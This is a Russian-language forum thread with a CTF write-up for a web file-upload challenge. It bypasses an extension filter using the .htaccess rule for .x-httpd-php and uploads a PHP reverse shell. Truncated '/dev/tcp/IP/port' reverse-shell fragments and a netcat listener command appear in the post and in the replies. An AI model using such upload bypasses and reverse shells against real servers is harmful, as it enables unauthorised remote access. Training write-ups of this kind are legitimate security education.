 |
|

26.12.2023, 11:30
|
|
Новичок
Регистрация: 19.07.2022
Сообщений: 0
С нами:
2012188
Репутация:
0
|
|
Рассмотрим таск под названием - Файлообменник из категории Веб.
Ссылка на задание: Игры Кодебай | CTF-платформа
Данный таск интересен тем, что он как бы и легкий, а как бы и нет. В нем необходимо, просто внимательно смотреть =)
И так приступим:
Начнем с того, что сначала мы смотрим что дано в самом задании, кроме IP и порта, иногда там могут быть хинты. В данном таске есть файл — task.zip, качаем его — он нам еще пригодиться, не просто же он нам дан.
Заходим на IP:порт и первое что мы замечаем, есть возможность загрузить файл. Сразу приходим на ум, что есть уязвимость вида: File Upload. Забегая веред, она там есть.
Пытаемся ее воспользоваться. Открываем в BurpSuite, и грузим файл вида file.php с содержимым:
PHP:
Код:
& /dev/tcp/IP/1234 0>&1'"); ?>
Что мы видим, файлы с расширением php грузить нельзя.
Значит надо изменить расширение файла, воспользовавшись Google, найдем на популярном сайте book.hacktricks.xyz (File Upload) расширения PHP.
Воспользуемся расширением *.phtm
Файл загрузился. Открываем данный файл в браузере, и видим, что данный файл не исполняется, значит данная директория заблокирована на исполнение файлов.
Первое, что приходит в голову, файл .htaccess. Вот тут нам и понадобиться тот файл (task.zip). Находим файл .htaccess и анализируем. Видим 20 строчку, где сказано, что нам разрешено загрузку файлов с расширением .x-httpd-php.
Воспользуемся этим.
Запускаем у себя NetCat (nc -lnvp 1234) и открываем файл.
Попадаем на сервак и ищем файл fl4g.txt, где и лежит наш флаг.
Надеюсь статья была полезна для Вас! Если найдете неточности или ошибки - обязательно напишите об этом в комментариях к статье.
|
|
|

26.12.2023, 12:31
|
|
Новичок
Регистрация: 07.07.2023
Сообщений: 0
С нами:
1504446
Репутация:
0
|
|
Хороший райтап. Давай больше на тему веб!
|
|
|

26.12.2023, 16:54
|
|
Новичок
Регистрация: 15.07.2018
Сообщений: 0
С нами:
4121094
Репутация:
0
|
|
stensil4rt сказал(а):
Видим 20 строчку, где сказано, что нам разрешено загрузку файлов с расширением .x-httpd-php.
Данное правило сообщает серверу немного другое: что все файлы с расширением .x-httpd-php должны быть обработаны как PHP-скрипты.
|
|
|

26.12.2023, 17:43
|
|
Новичок
Регистрация: 19.07.2022
Сообщений: 0
С нами:
2012188
Репутация:
0
|
|
N1GGA сказал(а):
Данное правило сообщает серверу немного другое: что все файлы с расширением .x-httpd-php должны быть обработаны как PHP-скрипты.
Спасибо за замечание.
|
|
|

03.01.2024, 10:31
|
|
Новичок
Регистрация: 31.01.2024
Сообщений: 0
С нами:
1204256
Репутация:
0
|
|
Здравствуйте! Классный Writeup, я осознал, для чего нужен файл .htaccess и почему мы меняем расширение загружаемого файла на .x-httpd-php но на предпоследнем шаге - "Запускаем у себя NetCat (nc -lnvp 1234) и открываем файл." беда, скрипт внутри файла не отрабатывает. Я не попадаю на сервер страница долго обновляется и все - белый экран. Если вам не сложно направьте меня в какую сторону думать)? Proxy я отключаю если что перед тем как переходить по ссылке с x-httpd-php файлом.
|
|
|

03.01.2024, 12:56
|
|
Познающий
Регистрация: 23.12.2023
Сообщений: 60
С нами:
1260136
Репутация:
0
|
|
morozko сказал(а):
Здравствуйте! Классный Writeup, я осознал, для чего нужен файл .htaccess и почему мы меняем расширение загружаемого файла на .x-httpd-php но на предпоследнем шаге - "Запускаем у себя NetCat (nc -lnvp 1234) и открываем файл." беда, скрипт внутри файла не отрабатывает. Я не попадаю на сервер страница долго обновляется и все - белый экран. Если вам не сложно направьте меня в какую сторону думать)? Proxy я отключаю если что перед тем как переходить по ссылке с x-httpd-php файлом.
Вам нужно поднять свой сервер или настроить туннель, чтобы поймать соединение. вписывая в скрипт ip и port своего сервера. В данной статье это не описывается.
|
|
|

03.01.2024, 13:51
|
|
Новичок
Регистрация: 19.07.2022
Сообщений: 0
С нами:
2012188
Репутация:
0
|
|
morozko сказал(а):
Здравствуйте! Классный Writeup, я осознал, для чего нужен файл .htaccess и почему мы меняем расширение загружаемого файла на .x-httpd-php но на предпоследнем шаге - "Запускаем у себя NetCat (nc -lnvp 1234) и открываем файл." беда, скрипт внутри файла не отрабатывает. Я не попадаю на сервер страница долго обновляется и все - белый экран. Если вам не сложно направьте меня в какую сторону думать)? Proxy я отключаю если что перед тем как переходить по ссылке с x-httpd-php файлом.
Да, как это уже сказал vov4ick, в данной статье не описывается настройка своего сервера, который бы принял соединение от веб-сервера. Попробуйте найти в Интернете, что такое ngrok, думаю Вам это поможет.
|
|
|

03.01.2024, 14:00
|
|
Новичок
Регистрация: 31.01.2024
Сообщений: 0
С нами:
1204256
Репутация:
0
|
|
stensil4rt сказал(а):
Да, как это уже сказал vov4ick, в данной статье не описывается настройка своего сервера, который бы принял соединение от веб-сервера. Попробуйте найти в Интернете, что такое ngrok, думаю Вам это поможет.
Если найдете свободное время, будьте добры объясните подробней про свой сервер и в какую часть скрипта вписывать ip port. У меня имеется VDS я через него VPN поднял, также использовал его в задании из категории Quest которое рассматривается в Обучении CTF. Я путаюсь - слишком много серверов XD. ProxyFoxy это же тоже прокси сервер который мы используем в Burp для перехвата, python3 -m http.server 9898 (тоже сервер) ну и мой VDS тоже сервер.
Про скрипт & /dev/tcp/IP/port 0>&1'"); ?> ---> & /dev/tcp/0.0.0.0:9898 0>&1'"); ?> верно ли я понял?
|
|
|

03.01.2024, 17:03
|
|
Новичок
Регистрация: 28.10.2015
Сообщений: 1
С нами:
5549366
Репутация:
0
|
|
morozko сказал(а):
Про скрипт & /dev/tcp/IP/port 0>&1'"); ?> ---> & /dev/tcp/0.0.0.0:9898 0>&1'"); ?> верно ли я понял?
& /dev/tcp/IP/PORT0>&1'"); ?>
|
|
|

03.01.2024, 17:06
|
|
Новичок
Регистрация: 28.10.2015
Сообщений: 1
С нами:
5549366
Репутация:
0
|
|
morozko сказал(а):
Если найдете свободное время, будьте добры объясните подробней про свой сервер и в какую часть скрипта вписывать ip port. У меня имеется VDS я через него VPN поднял, также использовал его в задании из категории Quest которое рассматривается в Обучении CTF. Я путаюсь - слишком много серверов XD. ProxyFoxy это же тоже прокси сервер который мы используем в Burp для перехвата, python3 -m http.server 9898 (тоже сервер) ну и мой VDS тоже сервер.
Способы получения обратного соединения (Reverse shell)
Доброго времени суток, уважаемые форумчане! Очередная статья будет посвящена еще одному проблемному вопросу, с которым часто приходится сталкиваться студентам курса WAPT при решении задач – это получение обратного шелла. Нет, в принципе вопрос не сложный и многие наверняка сталкивались с таким...
codeby.net
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|